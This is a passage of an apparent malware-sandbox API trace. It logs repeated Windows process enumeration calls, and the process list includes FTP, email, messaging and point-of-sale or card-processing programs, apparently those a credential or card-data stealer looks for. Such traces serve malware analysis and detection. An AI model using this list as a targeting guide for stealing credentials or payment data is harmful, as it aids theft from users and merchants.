th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0208.349] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0208.351] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0208.353] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.356] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0208.359] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0208.361] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0208.363] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0208.365] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0208.367] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0208.369] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0208.372] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0208.374] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0208.376] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0208.378] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0208.380] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0208.382] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0208.384] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0208.405] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0208.407] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0208.409] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0208.411] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0208.413] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0208.415] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0208.421] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0208.423] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0208.425] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0208.427] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0208.429] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0208.431] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0208.440] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0208.443] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0208.445] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0208.447] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0208.501] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0208.503] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0208.506] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0208.509] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0208.515] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0208.517] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0208.520] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0208.522] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0208.525] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0208.543] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0208.546] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0208.548] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0208.551] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0208.553] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0208.555] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0208.611] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0208.613] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0208.616] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0208.618] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0208.624] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0208.626] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0208.629] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0208.631] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0208.633] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0208.636] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0208.641] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0208.644] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0208.646] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0208.648] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0208.672] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0208.674] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0208.677] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0208.679] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0208.681] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0208.687] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0208.689] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0208.691] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0208.694] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0208.696] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0208.699] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0208.704] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0208.706] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0208.708] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0208.710] CloseHandle (hObject=0x11cc) returned 1 [0208.711] Sleep (dwMilliseconds=0x64) [0208.830] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0208.842] Process32First (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.844] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0208.846] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0208.848] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.849] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0208.851] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.852] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, 